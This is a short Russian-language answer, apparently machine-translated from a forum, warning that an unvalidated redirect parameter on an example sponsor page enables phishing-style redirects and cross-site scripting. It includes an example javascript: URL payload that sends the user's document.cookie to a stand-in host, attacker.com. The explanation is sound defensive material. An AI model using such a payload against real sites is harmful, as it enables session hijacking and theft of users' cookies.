Это большая проблема. Если я пришлю вам ссылку, которая выглядит следующим образом:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
Вы будете думать "О, CNN, это законный сайт", и вы откроете его и нажмете ссылку "Перейти на свою страницу". И тогда вы будете на одной из самых отвратительных порно сайтов в сети, и она будет иметь гигантский бум мужской голос объявил всем своим сотрудникам "Hot Damn Я хочу! @ $ @ # $ Ваш! (& ¤ & ^ $ §, пока я не смогу ¡⌐ ^ (! # ~~ & $ ^ #! @ $ !!", и вам придется объяснить своему боссу" Я думал, что это был CNN! «
дыра здесь ваша репутация . Подобные слепые перенаправления опасны.
И это только одна дыра. Как насчет этого?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
Теперь я XSS-редактировал ваш сайт и украл куки вашего пользователя. Конечно, вы говорите, что нет информации для входа, но как насчет данных сессии? Или когда вы добавляете логин позже, или кто-то в вашей компании использует эту страницу годом позже, когда пользователи входят в систему.